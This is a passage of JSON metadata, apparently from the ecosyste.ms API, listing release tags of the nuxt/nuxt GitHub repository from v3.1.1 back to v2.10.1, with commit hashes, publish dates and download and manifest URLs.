.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v